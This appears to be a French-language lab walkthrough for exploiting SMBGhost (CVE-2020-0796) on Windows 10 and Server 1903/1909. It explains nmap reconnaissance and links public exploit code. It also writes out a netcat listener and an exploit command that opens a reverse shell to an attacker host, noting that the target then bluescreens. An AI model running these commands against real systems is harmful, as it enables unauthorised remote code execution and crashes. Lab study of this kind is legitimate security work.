
Preuve de concept d'exploitation pour CVE-2020-0796 (SMBGhost) ciblant Windows 10/Server SMBv3.1.1. Inclut la reconnaissance Nmap, l'analyse de vulnérabilité et la livraison de charge utile de shell inversé.
**- Versions affectées*
- Windows 10 version 1903 pour systèmes 32 bits
- Windows 10 version 1903 pour systèmes ARM64
- Windows 10 version 1903 pour systèmes x64
- Windows 10 version 1909 pour systèmes 32 bits
- Windows 10 version 1909 pour systèmes ARM64
- Windows 10 version 1909 pour systèmes x64
- Windows Server, version 1903 (installation Server Core)
- Windows Server, version 1909 (installation Server Core)

Lancer Nmap pour scanner la plage réseau dans la zone DMZ
map -sS 192.168.116.0/24
nmap: est le nom du programme de scan réseau**.**
-sS: Choisit la méthode de scan TCP SYN. Lors de ce scan, Nmap envoie un paquet SYN au serveur cible et observe la réponse. Si le serveur cible répond avec un paquet SYN-ACK, Nmap sait que le port est ouvert. Si le serveur cible répond avec un paquet RST, cela signifie que le port est fermé.
-192.168.116.0/24: L'adresse IP ou la plage d'adresses IP spécifique que vous souhaitez scanner. Dans ce cas, la plage d'adresses est 192.168.116.0/24, décrivant toutes les adresses IP de 192.168.116.1 à 192.168.116.254.

=> On observe que l'adresse IP de la machine victime 192.116.145 a le port 445 ouvert.
· Utiliser Nmap pour scanner les vulnérabilités sur la machine victime
map -p445 –script smb-protocols 192.168.116.145
nmap: est le nom du programme de scan réseau.
-p445: Spécifie le port à scanner, dans ce cas le port 445. Le port 445 est généralement utilisé pour communiquer avec le service SMB (Server Message Block) sur les systèmes Windows.
--script smb-protocols: Sélectionne le script smb-protocols pour effectuer le scan. Ce script permet de vérifier et d'afficher des informations sur les versions du protocole SMB prises en charge sur le serveur cible.
192.168.116.145: L'adresse IP du serveur que vous souhaitez scanner. Dans ce cas, l'adresse IP configurée est 192.168.116.145

- Le résultat obtenu par smb-protocols indique que la machine victime est susceptible de présenter une vulnérabilité exploitable SMBv3.1.1
- Pour être plus certain, continuer à vérifier l'exploitabilité de la vulnérabilité CVE-2020-0796 en exécutant un script python
[]: -https://github.com/ly4k/SMBGhost "code d'exploitation"

=> Résultat Vulnerable -> détection de la vulnérabilité CVE 2020-0796 exploitable sur la machine victime.
**Lancer une attaque Reverse_shell**
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "code d'exploitation"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> RÉSULTAT : La machine attaquante obtient l'exécution de code shell sur la machine victime.

Après une connexion réussie, l'attaquant peut désormais exploiter et exécuter du code arbitraire sur la machine victime avec les droits User de l'utilisateur dans la session de connexion.
À la fin de la session, la machine victime rencontre une erreur BlueScreen et redémarre automatiquement.

*L'exécution de l'exploitation peut entraîner l'endommagement du système ciblé*